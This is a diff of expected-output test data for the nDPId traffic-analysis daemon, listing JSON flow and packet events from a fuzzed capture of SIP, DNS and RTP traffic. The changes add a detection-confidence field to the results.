 00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1120470984353,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":366,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":366,"pkt_l4_len":332,"ts_msec":1120470984353,"pkt":"ADBUADRWAODt4G69CABFAAFga\/oAAIARFdPAqAEC1PIhyRPEE8QBRC7GQUNLIHNpcDozNTEwNDcwNEBzaXAuY3liZXJjaXR5LmRrIFNJUC8yLjANCkZyb206ICJhcmlrIiA8c2lwOjM1MTA0qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":180000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1120470984353,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":180000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1120470984353,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":1120470985234,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470985234,"pkt":"ADBUADTZAODtAW69CABFAABIa\/sAAIARS1bAqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABF9zaXAEX3VkUQNzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":623,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470983999,"flow_last_seen":1120470985234,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470985234,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udq.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":623,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470983999,"flow_last_seen":1120470985234,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470985234,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udq.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1120470985348,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1120470985348,"pkt":"ADBUADRWAODtAW69CABFAADIa\/wAAIARFmjAqAED1PIhJHUwncgAHRjegAhvrgAABNg3lstx1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1U\/V1dXV1REEHBgYEhIeEBQXahMcGAQEBQYBAQAHBQUZEwUbGRATGQUEBAcDAgMDAAACDQ0NAAEDDQwNAAABAgMBBgYBDw4eDAMABwYAAwMGBwEEBgYbHxwRaWBiFBEQFGoTFWBpYX10UltZ10dcVlJVREtCdatzeFp8bmgUag=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":625,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985418,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1120470985418,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1120470985418,"pkt":"ADBUNjRWAODtAW69CABFAADIa\/0AAIARFmfAqAECJXMAJHUwncgAtL+rgAhvrwAABXg3lstxbmgVFGoUFBVpYG5qbG5kbGoWF2xubWBmfn9Fxsnw\/Ofz+uXwy+phC83k+sJTdF9CW\/bw8vzg7pfo8ldaT011Z399ZmV0dUN4S0dVQ2dmbWNsZGZkeGRvbxQUbBcRExAXEBwfHRAQFhAQHxwfGR4YEBcSFGxibWNqFRUXbmV3ckDQ93N9fmJnYmoVahcVZa9xWll+YGZ6cnJJZXpgeF1EQg=="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985418,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985418,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985421,"flow_last_seen":1120470985421,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1120470985421,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1120470985421,"pkt":"ADBUADRWAODtAW69CABFAADIa\/4AAIARFmbAqAEC1PIhJHUwncgAtNyMgGNvsAAABhg3lstxcX5wdvzF0Et0dn92T1BB0VhmZ2V\/Z294Y2ZmahQXFhQREBAVb2ZPemVlYWJoYE9\/YWZkcnV4bWwVFRVqZ2xpYn94ZmBnY2F0zfjXdmNiYXhveHJgaW5jUFlwZTFkYc9lamoREhAQEx4fHx0XahRvRl1F3V5ESXjQxFFR39TfQXR\/Z9L15ebs6JeW7+DslJOU6uqUn5CcnJKX+Ofs5+Hg6g=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985421,"flow_last_seen":1120470985421,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985421,"flow_last_seen":1120470985421,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1120470985427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1120470985427,"pkt":"ADBUADRWAODtAW69CABFAADIa\/8AAIARFmXAqAEC1PIhJHUwncgAtJlvgAhvsQAABrg3lstxkpfo6Zfq5frn5uz6+gt4emFkcGBneMvv7+rslZHuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1120470985429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1120470985429,"pkt":"ADBUADRWAODtAW69CABFAADIbAAAAIARFmTAqAEC1PIhJHUwncgAtMoSgAhvsgAABVg3lstxRH1wXN719vLg7uHxw3h4ZHZhfE9UWV\/RzzPt5\/PklJOUlJXt4uzx+Pjm5vPHzf38\/fr05+3ikurj4ezn4+H6\/97AwEJ8S9DN9Vd1XdzJ8eDp6eXwzcXWRUJnZHhnYX96aHLW+ubo6eHg5\/DG\/MNRcE3B+ubNy+Xu7Obt7+qX4+7oy9fw3vLT3N1W19X49PBBf39jZnhmbBEdEWpqb2BweA=="}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":631,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985504,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1120470985504,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1120470985504,"pkt":"ADBUADRWAODtAW69CABFAADIbAMAAIARFmHAqAEC1vIhJHUwncgAtLaDgAhvtQAACTg3lstx6urs5ueUkJOXlZGWbOyVlOD46O7hzXXbxsfz\/OLg5ufawPH4wk3N8Obu7+Pv6unk4fj\/29jZ1\/7l4+Ht7JOXyOrs4vPPUfVQz97J5fLjl5GXkpyRl+jqk5aQlero4svh7+rslJfp6uP+9vbL+OLg5vj99\/LL9ub4+uTs6ZSVlJXp6Ojv7eqWkZOTnJORkpCbk5GXlpaRkJBK6ejp7JWXlw=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985504,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985504,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985511,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1120470985511,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1120470985511,"pkt":"ADBUADRWAODtAb+9CABFAADIbAQAAIARFm9RqAEC1PIhJHUwncgAtIfqgAhvtgAACdg3lstxlpDplp2cmZ6fkpaRle3n9PTy\/CVzAJKehIeEmJGRl52QlJaX6OOU6JaRlp2cn4WEhZ2RkJeV6WOQnZ6EhJOFh4WFmYWYk7+dkpCQ6u\/qkZ2fmYSYnZ6Rk5OU7OD6+Pbh4PTl+OTo6unl9eXi7f7c1VT\/+uiX6JSUkJCV7uXm\/Obu7pWWkZeW7OPpk5Ofm5+Yk5WV7untlJeSkpeV7+qWkA=="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985511,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120470985511,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
 00489{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":633,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":146,"pkt_type":20992,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":146,"pkt_l4_len":0,"ts_msec":1120470986363,"pkt":"ADBUADRWAODtAW69UgBFAACEbAVoAIARFqPAqAEC9PIhJHUxnckAcCyBgMgABjeWy3FCyQfKXvrGAwAAJMMAAAAJAAAGDIHKAAs3lstxAR0xMTg5NDI5Ny00NDMyYTlmOEAxOTIuMTY4LjEuMgYFU0lQUFMAAIHLAAY3lstxEHNlc3Npb24gc2h1dGRvd24AAAE="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":633,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":20992}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":1120470987237,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470987237,"pkt":"ADBUADRWAODtAW69CABFAABIbAYAAIARS0vAqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaVR5AmRrAAAhAAE="}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":634,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470983999,"flow_last_seen":1120470987237,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470987237,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":634,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470983999,"flow_last_seen":1120470987237,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470987237,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":635,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470989238,"pkt":"ADBUADRWAODtAW69CABFAABIbAdtAIARS07AqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaVN5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":635,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814186,"flow_last_seen":1120470814186,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2799,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
